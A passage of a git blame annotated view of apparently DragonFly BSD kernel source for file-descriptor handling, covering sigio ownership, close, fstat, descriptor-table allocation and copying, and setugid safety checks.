1474 for (i = 0; i <= fdp->fd_lastfile; i++) {
0679adc4
MD
1475 if (fdp->fd_files[i].fp != NULL &&
1476 (fdp->fd_files[i].fileflags & UF_EXCLOSE)) {
984263bc
MD
1477 struct file *fp;
1478
1479#if 0
0679adc4 1480 if (fdp->fd_files[i].fileflags & UF_MAPPED)
984263bc
MD
1481 (void) munmapfd(p, i);
1482#endif
1483 if (i < fdp->fd_knlistsize)
1484 knote_fdclose(p, i);
1485 /*
1486 * NULL-out descriptor prior to close to avoid
1487 * a race while close blocks.
1488 */
0679adc4 1489 fp = fdp->fd_files[i].fp;
69908319 1490 funsetfd(fdp, i);
0679adc4 1491 closef(fp, td);
984263bc
MD
1492 }
1493 }
0679adc4 1494 while (fdp->fd_lastfile > 0 && fdp->fd_files[fdp->fd_lastfile].fp == NULL)
984263bc
MD
1495 fdp->fd_lastfile--;
1496}
1497
1498/*
1499 * It is unsafe for set[ug]id processes to be started with file
1500 * descriptors 0..2 closed, as these descriptors are given implicit
1501 * significance in the Standard C library. fdcheckstd() will create a
1502 * descriptor referencing /dev/null for each of stdin, stdout, and
1503 * stderr that is not already open.
1504 */
1505int
dadab5e9 1506fdcheckstd(struct proc *p)
984263bc 1507{
dadab5e9 1508 struct thread *td = p->p_thread;
fad57d0e 1509 struct nlookupdata nd;
dadab5e9
MD
1510 struct filedesc *fdp;
1511 struct file *fp;
1512 register_t retval;
1513 int fd, i, error, flags, devnull;
984263bc
MD
1514
1515 fdp = p->p_fd;
1516 if (fdp == NULL)
1517 return (0);
1518 devnull = -1;
1519 error = 0;
1520 for (i = 0; i < 3; i++) {
0679adc4 1521 if (fdp->fd_files[i].fp != NULL)
fad57d0e
MD
1522 continue;
1523 if (devnull < 0) {
1524 if ((error = falloc(p, &fp, NULL)) != 0)
1525 break;
1526
1527 error = nlookup_init(&nd, "/dev/null", UIO_SYSSPACE,
1528 NLC_FOLLOW|NLC_LOCKVP);
1529 flags = FREAD | FWRITE;
1530 if (error == 0)
1531 error = vn_open(&nd, fp, flags, 0);
1532 if (error == 0)
1533 error = fsetfd(p, fp, &fd);
1534 fdrop(fp, td);
1535 nlookup_done(&nd);
1536 if (error)
1537 break;
1538 KKASSERT(i == fd);
1539 devnull = fd;
1540 } else {
1541 error = kern_dup(DUP_FIXED, devnull, i, &retval);
1542 if (error != 0)
1543 break;
1544 }
984263bc
MD
1545 }
1546 return (error);
1547}
1548
1549/*
1550 * Internal form of close.
1551 * Decrement reference count on file structure.
dadab5e9 1552 * Note: td and/or p may be NULL when closing a file
984263bc
MD
1553 * that was being passed in a message.
1554 */
1555int
dadab5e9 1556closef(struct file *fp, struct thread *td)
984263bc
MD
1557{
1558 struct vnode *vp;
1559 struct flock lf;
1560 struct filedesc_to_leader *fdtol;
dadab5e9 1561 struct proc *p;
984263bc
MD
1562
1563 if (fp == NULL)
1564 return (0);
dadab5e9
MD
1565 if (td == NULL) {
1566 td = curthread;
1567 p = NULL; /* allow no proc association */
1568 } else {
1569 p = td->td_proc; /* can also be NULL */
1570 }
984263bc
MD
1571 /*
1572 * POSIX record locking dictates that any close releases ALL
1573 * locks owned by this process. This is handled by setting
1574 * a flag in the unlock to free ONLY locks obeying POSIX
1575 * semantics, and not to free BSD-style file locks.
1576 * If the descriptor was in a message, POSIX-style locks
1577 * aren't passed with the descriptor.
1578 */
1579 if (p != NULL &&
1580 fp->f_type == DTYPE_VNODE) {
1581 if ((p->p_leader->p_flag & P_ADVLOCK) != 0) {
1582 lf.l_whence = SEEK_SET;
1583 lf.l_start = 0;
1584 lf.l_len = 0;
1585 lf.l_type = F_UNLCK;
1586 vp = (struct vnode *)fp->f_data;
1587 (void) VOP_ADVLOCK(vp, (caddr_t)p->p_leader, F_UNLCK,
1588 &lf, F_POSIX);
1589 }
1590 fdtol = p->p_fdtol;
1591 if (fdtol != NULL) {
1592 /*
1593 * Handle special case where file descriptor table
1594 * is shared between multiple process leaders.
1595 */
1596 for (fdtol = fdtol->fdl_next;
1597 fdtol != p->p_fdtol;
1598 fdtol = fdtol->fdl_next) {
1599 if ((fdtol->fdl_leader->p_flag &
1600 P_ADVLOCK) == 0)
1601 continue;
1602 fdtol->fdl_holdcount++;
1603 lf.l_whence = SEEK_SET;
1604 lf.l_start = 0;
1605 lf.l_len = 0;
1606 lf.l_type = F_UNLCK;
1607 vp = (struct vnode *)fp->f_data;
1608 (void) VOP_ADVLOCK(vp,
1609 (caddr_t)p->p_leader,
1610 F_UNLCK, &lf, F_POSIX);
1611 fdtol->fdl_holdcount--;
1612 if (fdtol->fdl_holdcount == 0 &&
1613 fdtol->fdl_wakeup != 0) {
1614 fdtol->fdl_wakeup = 0;
1615 wakeup(fdtol);
1616 }
1617 }
1618 }
1619 }
dadab5e9 1620 return (fdrop(fp, td));
984263bc
MD
1621}
1622
1623int
dadab5e9 1624fdrop(struct file *fp, struct thread *td)
984263bc
MD
1625{
1626 struct flock lf;
1627 struct vnode *vp;
1628 int error;
1629
1630 if (--fp->f_count > 0)
1631 return (0);
1632 if (fp->f_count < 0)
1633 panic("fdrop: count < 0");
1634 if ((fp->f_flag & FHASLOCK) && fp->f_type == DTYPE_VNODE) {
1635 lf.l_whence = SEEK_SET;
1636 lf.l_start = 0;
1637 lf.l_len = 0;
1638 lf.l_type = F_UNLCK;
1639 vp = (struct vnode *)fp->f_data;
1640 (void) VOP_ADVLOCK(vp, (caddr_t)fp, F_UNLCK, &lf, F_FLOCK);
1641 }
1642 if (fp->f_ops != &badfileops)
dadab5e9 1643 error = fo_close(fp, td);
984263bc
MD
1644 else
1645 error = 0;
1646 ffree(fp);
1647 return (error);
1648}
1649
1650/*
1651 * Apply an advisory lock on a file descriptor.
1652 *
1653 * Just attempt to get a record lock of the requested type on
1654 * the entire file (l_whence = SEEK_SET, l_start = 0, l_len = 0).
1655 */
984263bc
MD
1656/* ARGSUSED */
1657int
41c20dac 1658flock(struct flock_args *uap)
984263bc 1659{
41c20dac
MD
1660 struct proc *p = curproc;
1661 struct filedesc *fdp = p->p_fd;
1662 struct file *fp;
984263bc
MD
1663 struct vnode *vp;
1664 struct flock lf;
1665
1666 if ((unsigned)uap->fd >= fdp->fd_nfiles ||
0679adc4 1667 (fp = fdp->fd_files[uap->fd].fp) == NULL)
984263bc
MD
1668 return (EBADF);
1669 if (fp->f_type != DTYPE_VNODE)
1670 return (EOPNOTSUPP);
1671 vp = (struct vnode *)fp->f_data;
1672 lf.l_whence = SEEK_SET;
1673 lf.l_start = 0;
1674 lf.l_len = 0;
1675 if (uap->how & LOCK_UN) {
1676 lf.l_type = F_UNLCK;
1677 fp->f_flag &= ~FHASLOCK;
1678 return (VOP_ADVLOCK(vp, (caddr_t)fp, F_UNLCK, &lf, F_FLOCK));
1679 }
1680 if (uap->how & LOCK_EX)
1681 lf.l_type = F_WRLCK;
1682 else if (uap->how & LOCK_SH)
1683 lf.l_type = F_RDLCK;
1684 else
1685 return (EBADF);
1686 fp->f_flag |= FHASLOCK;
1687 if (uap->how & LOCK_NB)
1688 return (VOP_ADVLOCK(vp, (caddr_t)fp, F_SETLK, &lf, F_FLOCK));
1689 return (VOP_ADVLOCK(vp, (caddr_t)fp, F_SETLK, &lf, F_FLOCK|F_WAIT));
1690}
1691
1692/*
1693 * File Descriptor pseudo-device driver (/dev/fd/).
1694 *
1695 * Opening minor device N dup()s the file (if any) connected to file
1696 * descriptor N belonging to the calling process. Note that this driver
1697 * consists of only the ``open()'' routine, because all subsequent
1698 * references to this file will be direct to the other driver.
1699 */
1700/* ARGSUSED */
1701static int
41c20dac 1702fdopen(dev_t dev, int mode, int type, struct thread *td)
984263bc 1703{
41c20dac 1704 KKASSERT(td->td_proc != NULL);
984263bc
MD
1705
1706 /*
1707 * XXX Kludge: set curproc->p_dupfd to contain the value of the
1708 * the file descriptor being sought for duplication. The error
1709 * return ensures that the vnode for this device will be released
1710 * by vn_open. Open will detect this special error and take the
1711 * actions in dupfdopen below. Other callers of vn_open or VOP_OPEN
1712 * will simply report the error.
1713 */
41c20dac 1714 td->td_proc->p_dupfd = minor(dev);
984263bc
MD
1715 return (ENODEV);
1716}
1717
1718/*
1719 * Duplicate the specified descriptor to a free descriptor.
1720 */
1721int
41c20dac 1722dupfdopen(struct filedesc *fdp, int indx, int dfd, int mode, int error)
984263bc 1723{
41c20dac 1724 struct file *wfp;
984263bc
MD
1725 struct file *fp;
1726
1727 /*
1728 * If the to-be-dup'd fd number is greater than the allowed number
1729 * of file descriptors, or the fd to be dup'd has already been
1730 * closed, then reject.
1731 */
1732 if ((u_int)dfd >= fdp->fd_nfiles ||
0679adc4 1733 (wfp = fdp->fd_files[dfd].fp) == NULL) {
984263bc
MD
1734 return (EBADF);
1735 }
1736
1737 /*
1738 * There are two cases of interest here.
1739 *
1740 * For ENODEV simply dup (dfd) to file descriptor
1741 * (indx) and return.
1742 *
1743 * For ENXIO steal away the file structure from (dfd) and
1744 * store it in (indx). (dfd) is effectively closed by
1745 * this operation.
1746 *
1747 * Any other error code is just returned.
1748 */
1749 switch (error) {
1750 case ENODEV:
1751 /*
1752 * Check that the mode the file is being opened for is a
1753 * subset of the mode of the existing descriptor.
1754 */
1755 if (((mode & (FREAD|FWRITE)) | wfp->f_flag) != wfp->f_flag)
1756 return (EACCES);
0679adc4 1757 fp = fdp->fd_files[indx].fp;
984263bc 1758#if 0
0679adc4 1759 if (fp && fdp->fd_files[indx].fileflags & UF_MAPPED)
984263bc
MD
1760 (void) munmapfd(p, indx);
1761#endif
0679adc4
MD
1762 fdp->fd_files[indx].fp = wfp;
1763 fdp->fd_files[indx].fileflags = fdp->fd_files[dfd].fileflags;
984263bc
MD
1764 fhold(wfp);
1765 if (indx > fdp->fd_lastfile)
1766 fdp->fd_lastfile = indx;
1767 /*
1768 * we now own the reference to fp that the ofiles[] array
1769 * used to own. Release it.
1770 */
1771 if (fp)
dadab5e9 1772 fdrop(fp, curthread);
984263bc
MD
1773 return (0);
1774
1775 case ENXIO:
1776 /*
1777 * Steal away the file pointer from dfd, and stuff it into indx.
1778 */
0679adc4 1779 fp = fdp->fd_files[indx].fp;
984263bc 1780#if 0
0679adc4 1781 if (fp && fdp->fd_files[indx].fileflags & UF_MAPPED)
984263bc
MD
1782 (void) munmapfd(p, indx);
1783#endif
0679adc4
MD
1784 fdp->fd_files[indx].fp = fdp->fd_files[dfd].fp;
1785 fdp->fd_files[indx].fileflags = fdp->fd_files[dfd].fileflags;
69908319 1786 funsetfd(fdp, dfd);
984263bc
MD
1787
1788 /*
0679adc4 1789 * we now own the reference to fp that the files[] array
984263bc
MD
1790 * used to own. Release it.
1791 */
1792 if (fp)
dadab5e9 1793 fdrop(fp, curthread);
984263bc
MD
1794 /*
1795 * Complete the clean up of the filedesc structure by
1796 * recomputing the various hints.
1797 */
1798 if (indx > fdp->fd_lastfile) {
1799 fdp->fd_lastfile = indx;
1800 } else {
1801 while (fdp->fd_lastfile > 0 &&
0679adc4 1802 fdp->fd_files[fdp->fd_lastfile].fp == NULL) {
984263bc
MD
1803 fdp->fd_lastfile--;
1804 }
984263bc
MD
1805 }
1806 return (0);
1807
1808 default:
1809 return (error);
1810 }
1811 /* NOTREACHED */
1812}
1813
1814
1815struct filedesc_to_leader *
1816filedesc_to_leader_alloc(struct filedesc_to_leader *old,
1817 struct proc *leader)
1818{
1819 struct filedesc_to_leader *fdtol;
1820
7bf8660a
MD
1821 fdtol = malloc(sizeof(struct filedesc_to_leader),
1822 M_FILEDESC_TO_LEADER, M_WAITOK);
984263bc
MD
1823 fdtol->fdl_refcount = 1;
1824 fdtol->fdl_holdcount = 0;
1825 fdtol->fdl_wakeup = 0;
1826 fdtol->fdl_leader = leader;
1827 if (old != NULL) {
1828 fdtol->fdl_next = old->fdl_next;
1829 fdtol->fdl_prev = old;
1830 old->fdl_next = fdtol;
1831 fdtol->fdl_next->fdl_prev = fdtol;
1832 } else {
1833 fdtol->fdl_next = fdtol;
1834 fdtol->fdl_prev = fdtol;
1835 }
1836 return fdtol;
1837}
1838
1839/*
1840 * Get file structures.
1841 */
1842static int
1843sysctl_kern_file(SYSCTL_HANDLER_ARGS)
1844{
7b124c9f
JS
1845 struct kinfo_file kf;
1846 struct filedesc *fdp;
984263bc 1847 struct file *fp;
7b124c9f 1848 struct proc *p;
6d132b4d
MD
1849 int count;
1850 int error;
1851 int n;
984263bc
MD
1852
1853 /*
7b124c9f
JS
1854 * Note: because the number of file descriptors is calculated
1855 * in different ways for sizing vs returning the data,
1856 * there is information leakage from the first loop. However,
1857 * it is of a similar order of magnitude to the leakage from
1858 * global system statistics such as kern.openfiles.
6d132b4d
MD
1859 *
1860 * When just doing a count, note that we cannot just count
1861 * the elements and add f_count via the filehead list because
1862 * threaded processes share their descriptor table and f_count might
1863 * still be '1' in that case.
984263bc 1864 */
6d132b4d 1865 count = 0;
7b124c9f 1866 error = 0;
7b124c9f
JS
1867 LIST_FOREACH(p, &allproc, p_list) {
1868 if (p->p_stat == SIDL)
1869 continue;
6d132b4d 1870 if (!PRISON_CHECK(req->td->td_proc->p_ucred, p->p_ucred) != 0)
7b124c9f 1871 continue;
6d132b4d 1872 if ((fdp = p->p_fd) == NULL)
7b124c9f 1873 continue;
7b124c9f 1874 for (n = 0; n < fdp->fd_nfiles; ++n) {
0679adc4 1875 if ((fp = fdp->fd_files[n].fp) == NULL)
7b124c9f 1876 continue;
6d132b4d
MD
1877 if (req->oldptr == NULL) {
1878 ++count;
1879 } else {
1880 kcore_make_file(&kf, fp, p->p_pid,
1881 p->p_ucred->cr_uid, n);
1882 error = SYSCTL_OUT(req, &kf, sizeof(kf));
1883 if (error)
1884 break;
1885 }
7b124c9f 1886 }
984263bc 1887 if (error)
7b124c9f 1888 break;
984263bc 1889 }
6d132b4d
MD
1890
1891 /*
1892 * When just calculating the size, overestimate a bit to try to
1893 * prevent system activity from causing the buffer-fill call
1894 * to fail later on.
1895 */
1896 if (req->oldptr == NULL) {
1897 count = (count + 16) + (count / 10);
1898 error = SYSCTL_OUT(req, NULL, count * sizeof(kf));
1899 }
7b124c9f 1900 return (error);
984263bc
MD
1901}
1902
1903SYSCTL_PROC(_kern, KERN_FILE, file, CTLTYPE_OPAQUE|CTLFLAG_RD,
1904 0, 0, sysctl_kern_file, "S,file", "Entire file table");
1905
1906SYSCTL_INT(_kern, KERN_MAXFILESPERPROC, maxfilesperproc, CTLFLAG_RW,
1907 &maxfilesperproc, 0, "Maximum files allowed open per process");
1908
1909SYSCTL_INT(_kern, KERN_MAXFILES, maxfiles, CTLFLAG_RW,
1910 &maxfiles, 0, "Maximum number of files");
1911
60ee93b9
MD
1912SYSCTL_INT(_kern, OID_AUTO, maxfilesrootres, CTLFLAG_RW,
1913 &maxfilesrootres, 0, "Descriptors reserved for root use");
1914
984263bc
MD
1915SYSCTL_INT(_kern, OID_AUTO, openfiles, CTLFLAG_RD,
1916 &nfiles, 0, "System-wide number of open files");
1917
1918static void
1919fildesc_drvinit(void *unused)
1920{
1921 int fd;
1922
e4c9c0c8
MD
1923 cdevsw_add(&fildesc_cdevsw, 0, 0);
1924 for (fd = 0; fd < NUMFDESC; fd++) {
984263bc
MD
1925 make_dev(&fildesc_cdevsw, fd,
1926 UID_BIN, GID_BIN, 0666, "fd/%d", fd);
e4c9c0c8 1927 }
984263bc
MD
1928 make_dev(&fildesc_cdevsw, 0, UID_ROOT, GID_WHEEL, 0666, "stdin");
1929 make_dev(&fildesc_cdevsw, 1, UID_ROOT, GID_WHEEL, 0666, "stdout");
1930 make_dev(&fildesc_cdevsw, 2, UID_ROOT, GID_WHEEL, 0666, "stderr");
1931}
1932
1933struct fileops badfileops = {
f53ede20 1934 NULL, /* port */
455fcd7e 1935 NULL, /* clone */
984263bc
MD
1936 badfo_readwrite,
1937 badfo_readwrite,
1938 badfo_ioctl,
1939 badfo_poll,
1940 badfo_kqfilter,
1941 badfo_stat,
1942 badfo_close
1943};
1944
1945static int
dadab5e9
MD
1946badfo_readwrite(
1947 struct file *fp,
1948 struct uio *uio,
1949 struct ucred *cred,
1950 int flags,
1951 struct thread *td
1952) {
984263bc
MD
1953 return (EBADF);
1954}
1955
1956static int
dadab5e9 1957badfo_ioctl(struct file *fp, u_long com, caddr_t data, struct thread *td)
984263bc 1958{
984263bc
MD
1959 return (EBADF);
1960}
1961
1962static int
dadab5e9 1963badfo_poll(struct file *fp, int events, struct ucred *cred, struct thread *td)
984263bc 1964{
984263bc
MD
1965 return (0);
1966}
1967
1968static int
dadab5e9 1969badfo_kqfilter(struct file *fp, struct knote *kn)
984263bc 1970{
984263bc
MD
1971 return (0);
1972}
1973
1974static int
dadab5e9 1975badfo_stat(struct file *fp, struct stat *sb, struct thread *td)
984263bc 1976{
984263bc
MD
1977 return (EBADF);
1978}
1979
1980static int
dadab5e9 1981badfo_close(struct file *fp, struct thread *td)
984263bc 1982{
984263bc
MD
1983 return (EBADF);
1984}
1985
1986SYSINIT(fildescdev,SI_SUB_DRIVERS,SI_ORDER_MIDDLE+CDEV_MAJOR,
1987 fildesc_drvinit,NULL)
|
__label__pos
| 0.859833 |
Entity Framework Include directive not getting all expected related rows
.net c# entity-framework entity-framework-6
Question
Entity framework was loading a lot of data through lazy loading, which I noticed when troubleshooting some performance problems (900 additional query calls ain't quick!). yet I was certain that I had the right include. The real use case is more complicated, so I don't have much room to rework the signature of what I'm doing, but I've managed to condense this down to a fairly small test case to illustrate the confusion I'm seeing. Hopefully, this is a clear illustration of the problem I'm experiencing.
Many MetaInfo rows relating to documents. I want all MetaInfo rows to be included so I won't have to send out a separate request for all the Documents MetaInfo, but I also want to have all documents categorized by MetaInfo rows with a specified value.
I have the following question, then.
ctx.Configuration.LazyLoadingEnabled = false;
var DocsByCreator = ctx.Documents
.Include(d => d.MetaInfo) // Load all the metaInfo for each object
.SelectMany(d => d.MetaInfo.Where(m => m.Name == "Author") // For each Author
.Select(m => new { Doc = d, Creator = m })) // Create an object with the Author and the Document they authored.
.ToList(); // Actualize the collection
I anticipated that this would have all of the Document / Author pairings and be fully populated with Document MetatInfo properties.
However, the Documents MetaInfo field ONLY contains MetaInfo objects with Name == "Author," so that's not what occurs. I still receive the Document objects and the Authors perfectly fine.
The same thing happens if I move the where clause out of the select many, until I move it to after the actualization. While this may not seem like a significant concern, it is in the real application since it implies we are receiving much more data than we wish to handle.
After experimenting with several methods, I believe the problem seems to be when you do a select(...new...) along with the where and the include. After actualization, performing the select or where clause causes the data to show as I had anticipated.
I modified it as follows to test the idea since I thought there could be a problem with the MetaInfo property of Document being filtered. I was startled to see that this also produces the same (and, in my opinion, incorrect) outcome.
ctx.Configuration.LazyLoadingEnabled = false;
var DocsByCreator = ctx.Meta
.Where(m => m.Name == "Author")
.Include(m => m.Document.MetaInfo) // Load all the metaInfo for Document
.Select(m => new { Doc = m.Document, Creator = m })
.ToList(); // Actualize the collection
I anticipated that because we're not putting the location on the Document.MetaInfo property, this would get over the issue, but oddly enough, the papers still only seem to contain a "Author" MetaInfo object.
As far as I can tell, all of the test cases in the straightforward test project I developed and posted to github passed; only the ones with premature actualisation did.
https://github.com/Robert-Laverick/EFIncludeIssue
Anyone have a theory? Is there any way I'm misusing EF or SQL? Is there anything I can do to obtain the same outcomes organization? Is this an EF problem that has just gone unnoticed since LazyLoad is enabled by default and this is a bit of an unusual group type operation?
1
2
10/10/2018 5:59:33 PM
Accepted Answer
A drawback of EF is that includes won't be taken into account if the scope of the entities returned changes from where they were introduced.
For EF6, I couldn't locate a reference to this, although EF Core has documentation on it. (https://docs.microsoft.com/en-us/ef/core/querying/related-data) (see "ignore includes") (see "ignore includes") It may be a restriction put in place to prevent EF's SQL creation from going entirely MIA in some circumstances.
the whilevar docs = context.Documents.Include(d => d.Metas) would provide the eagerly loaded metas for the document; the moment you.SelectMany() The Include statement is disregarded since you are altering the data that EF is meant to return.
If you would want to return all of the documents together with a property identifying their author:
var DocsByCreator = ctx.Documents
.Include(d => d.MetaInfo)
.ToList() // Materialize the documents and their Metas.
.SelectMany(d => d.MetaInfo.Where(m => m.Name == "Author") // For each Author
.Select(m => new { Doc = d, Creator = m })) // Create an object with the Author and the Document they authored.
.ToList(); // grab your collection of Doc and Author.
If you're just interested in documents with authors:
var DocsByCreator = ctx.Documents
.Include(d => d.MetaInfo)
.Where(d => d.MetaInfo.Any(m => m.Name == "Author")
.ToList() // Materialize the documents and their Metas.
.SelectMany(d => d.MetaInfo.Where(m => m.Name == "Author") // For each Author
.Select(m => new { Doc = d, Creator = m })) // Create an object with the Author and the Document they authored.
.ToList(); // grab your collection of Doc and Author.
As a result, you must make sure that all of your filtering logic is applied above that.'ToList() call. As an alternative, you may think about resolving the Author meta after the query, say, when view models are filled, or by using an unmapped "Author" attribute on Document. Despite the fact that if their usage sneaks into an EF query, you receive a nasty runtime error, I normally steer clear of unmapped properties.
Edit: Considering the need to skip and take, I advise using view models to deliver data rather than entities. By using a view model, you can tell EF to just deliver the raw data you want. View models may be composed using either straightforward filler code or Automapper, which works well with both EF and IQueryable and can handle the majority of delayed scenarios like this.
For instance:
public class DocumentViewModel
{
public int DocumentId { get; set; }
public string Name { get; set; }
public ICollection<MetaViewModel> Metas { get; set; } = new List<MetaViewModel>();
[NotMapped]
public string Author // This could be update to be a Meta, or specialized view model.
{
get { return Metas.SingleOrDefault(x => x.Name == "Author")?.Value; }
}
}
public class MetaViewModel
{
public int MetaId { get; set; }
public string Name { get; set; }
public string Value { get; set; }
}
Next, the issue:
var viewModels = context.Documents
.Select(x => new DocumentViewModel
{
DocumentId = x.DocumentId,
Name = x.Name,
Metas = x.Metas.Select(m => new MetaViewModel
{
MetaId = m.MetaId,
Name = m.Name,
Value = m.Value
}).ToList()
}).Skip(pageNumber*pageSize)
.Take(PageSize)
.ToList();
At the data level, the connection between a "author" and a document is assumed rather than enforced. With this approach, the entity models remain "pure" to the data representation, and the code is given control over changing the inferred connection into the author of a document.
The .Select() Automapper can manage population using.ProjectTo<TViewModel>() .
You can prevent problems like these by returning view models rather than entities. Include() operations are invalidated, problems resulting from the temptation to detach and reattach entities between contexts are avoided, performance and resource usage are improved by only selecting and sending the necessary data, lazy load serialization problems are avoided if you forget to disable lazy-load, and unexpected #null data problems are avoided with it.
2
10/11/2018 9:39:08 PM
Related Questions
Related
Licensed under: CC-BY-SA with attribution
Not affiliated with Stack Overflow
Licensed under: CC-BY-SA with attribution
Not affiliated with Stack Overflow
|
__label__pos
| 0.615498 |
Codes work in console, irb, but not on website
Jason wrote:
I have the following code in my controller:
if request.post?
rid = params[:route_id]
salesorders = SalesOrder.find(:all)
@sales_orders = []
for so in salesorders
if not so.latest_history.nil?
if so.latest_history.route_id == rid
@sales_orders << so
end
end
end
end
If I use script/console, using the integer 2 instead of the
params[:route_id], it returns 19 results into @sales_orders. When I run
it on my site, I get 0 results. What's the difference? I ran
debug(params) and it's showing params[:route_id] is begin set to 2.
Any ideas?
Thanks!
Probably a data type mismatch. E.g. one is a string and the other is an integer/fixnum.
|
__label__pos
| 0.941849 |
电子商务网站开发与建设
概要
64学时 3.5学分
章节安排
1. 电子商务网站概况
2. HTML5+CSS3
3. JavaScript
4. Node
电子商务网站概述
电子商务网站定义
电子商务网站是指一个企业、机构或公司在互联网上建立的站点,其目的是为了宣传企业形象、发布产品信息、宣传经济法规、提供商业服务等。
电子商务网站功能
• 企业形象宣传
• 新闻发布、供求信息发布
• 产品和服务项目展示
• 商品和服务定购
电子商务网站的架构
电子商务网站的架构
电子商务网站的构成要素
• 网站域名
• 网站物理地点
• 网站页面
• 商品目录
• 购物车
• 付款台
JavaScript
• 基础语法
• 客户端JavaScript
基础语法
• 词法结构
• 类型、变量、运算符和表达式
• 语句
• 数组
• 函数
• 对象
• 类和模块
• 正则表达式的模式匹配
词法结构
JavaScript是区分大小写的语言。
JavaScript支持2种格式的注释:
//这里是单行注释
/*这里是一段注释(这里的注释可以连写多行)*/
JavaScript中,标识符用来对变量和函数进行命名。标识符必须以字母、下划线(_)或美元符($)开始。后续的字符可以是字母、数字、下划线或美元符。
JavaScript保留字不能作为标记符,例如:breakdeletefunctionreturntypeofcasedoifswitchvarcatch
JavaScript使用分号(;)将语句分隔开。
类型、变量、运算符和表达式
JavaScript的数据类型分为2类:
• 原始类型:包括数字、字符串和布尔值。JavaScript中有两个特殊的原始值:null(空)和undefined(未定义)。
• 对象类型:是属性的集合,每个属性都由“名/值对”构成。
数字、算术运算符
数字:包括整数、浮点数。
算术运算符:加(+)、减(-)、乘(*)、除(/)、求余数(%)、递增(++)、递减(--)、按位异或(^)。
• 注意:++--运算符的返回值依赖于它相对于操作数的位置。当运算符在操作数之前,称为“前增量”运算符,它对操作数进行增量计算,并返回计算后的值。当运算符在操作数之后,称为“后增量”运算符,它对操作数进行增量计算,但返回未做增量计算的值。
var i=1,j=++i; //i和j的值都是2
var i=1,j=i++; //i是2,j是1
• ^如果不是出现在正则表达式中,那么其代表按位异或运算符,也可以充当二进制算法。
• 异或的算法为相同输出0,不同输出1
a^b a的二进制 b的二进制 运算结果二进制 运算结果十进制
6^8 0110(三位,不够前面加0) 1000 1110 14
20^31 10100 11111 01011 11
数学常量
常量 说明
Math.E 常量e,自然对数的底数
Math.LN10 10的自然对数
Math.LN2 2的自然对数
Math.LOG10E e以10为底的对数
Math.LOG2E e以2为底的对数
Math.PI 常量π
Math.SQRT1_2 2的平方根的倒数
Math.SQRT2 2的平方根
数学函数
函数 说明 函数 说明
Math.abs(x) 返回x的绝对值 Math.acos(x) 返回x的反余弦值
Math.asin(x) 返回x的反正弦值 Math.atan(x) 返回x的反正切值
Math.atan2(y,x) 返回从X轴到指定点的角度,y为点的Y坐标,x为点的X坐标 Math.ceil(x) 返回大于或等于x的最接近的整数
Math.cos(x) 返回x的余弦值 Math.exp(x) 返回e的x次方
Math.floor(x) 返回小于或等于x的最接近的整数 Math.log(x) 返回x的自然对数
Math.max(args…) 返回参数中最大的值,参数中可以有多个值 Math.min(args…) 返回参数中最小的值,参数中可以有多个值
Math.pow(x,y) 返回xy次方 Math.random() 返回一个在[0.0,1)之间的随机数
Math.round(x) 返回最接近x的整数 Math.sin(x) 返回x的正弦值
Math.sqrt(x) 返回x的平方根 Math.tan(x) 返回x的正切值
数字相关方法
方法 说明
n.toExponential(digits) 返回以指数记数法表示的n的字符串格式,小数点前有一个数字,小数点后有digits个数字
n.toFixed(digits) 返回n的字符串格式,不使用指数记数法,在小数点后有指定的digits个数字
n.toLocaleString() n转换为本地格式的字符串
n.toPrecision(prec) 返回一个包含prec位有效数字的数字字符串,如果prec足够大,包括当前数字的所有整数部分,则返回值与toFixed方法一致。其他情况下,将使用指数记数法,小数点前有一个数字,小数点后有prec-1个数字
n.toString() n转换为字符串
Number(object) 把对象的值转换为数字。如果参数是Date对象,Number()返回从1970年1月1日至今的毫秒数。如果对象的值无法转换为数字,那么Number()函数返回NaN
字符串
由单引号或双引号括起来的字符序列。由单引号定界的字符串中可以包含双引号,由双引号定界的字符串中也可以包含单引号。
• 注意:当使用单引号来定界字符串时,需注意英文中的缩写(can't)。因为撇号和单引号是同一个字符,所以必须使用转义字符(\)来转义,例如'can\'t'
JavaScript的内置功能之一就是字符串的连接。连接运算符为“+”。例如:
var msg="hello, "+"world"; //生成字符串“hello, world”
length属性可以确定一个字符串的长度,例如:msg.length
JavaScript中用“>”或“<”操作符比较字符串大小时,它们只会比较这些字符的Unicode编码,而不考虑本地的顺序。
字符串类型的大小判断是一个字符和一个字符的比较,只要有字符不同就停止继续判断并返回比较结果。例如:"aBc"<"ab";
localeCompare方法可以实现汉字按拼音排序。
字符集 范围 Unicode编码(16进制) Unicode编码(10进制)
数字 0~9 30~39 48~57
大写字母 A~Z 41~5A 65~90
小写字母 a~z 61~7A 97~122
基本汉字 ~ 4E00~9FA5 19968~40869
字符串相关方法
方法 说明 方法 说明
s.charAt(n) 返回字符串s的第n个字符,从0开始 s.concat(value,…) 返回由每个参数连接为s而组成的新的字符串。 s="hello"; s.concat("","world","!");
s.indexOf(s1 [,start]) 返回在sstart位置之后,s1第一次出现的位置,如果没有找到则返回-1 s.lastIndexOf(s1[,start]) 返回s1在字符串sstart位置之前最后一次出现的位置,如果没有找到则返回-1。其从s的结尾开始搜索到开头
s.trim() 去掉开头和结尾处的空白字符 s.match(s1) 在字符串内检索指定的值,若找到,则返回s1,若没有找到,则返回null
s.replace(s1,s2) 用于在s中用s2替换s1 s.search(s1) 返回第一个s1相匹配的子串的起始位置。如果没有找到任何匹配的子串,则返回 -1
s.slice(start,end) 返回从start位置开始,直到但不包含end位置的所有字符 s.split(delimiter) 通过delimiters切分成一个数组。
s.substr(start,length) 返回从start位置开始的length个字符 s.substring(start,end) 返回从start位置开始,直到但不包含end位置的所有字符
s.toLocaleLowerCase() 以本地化的方式将s转为小写 s.toLocaleUpperCase() 以本地化的方式将s转为大写
s.toLowerCase() s转为小写 s.toUpperCase() s转为大写
s.localeCompare(s1[,locale]) ss1小,返回一个小于0的数,若ss1大,返回一个大于0的数,若相同,返回0。可用于汉字按拼音排序的规则,例如"张三">"李四"。注意:Chrome浏览器在使用时需用: s.localeCompare(s1,"zh")locale包含一种或多种语言或区域设置标记的区域设置字符串数组。如果包含多个区域设置字符串,请以降序优先级对它们进行排列,确保首个条目为首选区域位置。如果省略此参数,则使用JavaScript运行时的默认区域设置。
布尔值、逻辑运算符、关系运算符、nullundefined
布尔值:这个类型只有两个值,保留字truefalse
逻辑运算符:&&(逻辑与)、||(逻辑或)、!(逻辑非)
关系运算符:==(等于)、<(小于)、>(大于)、<=(小于等于)、>=(大于等于)、!=(不等于)
null是JavaScript语言的关键字,表示一个特殊值,常用来描述“空值”。
undefined是变量的一种取值,表明变量没有初始化。如果函数没有返回值,则返回undefined
变量
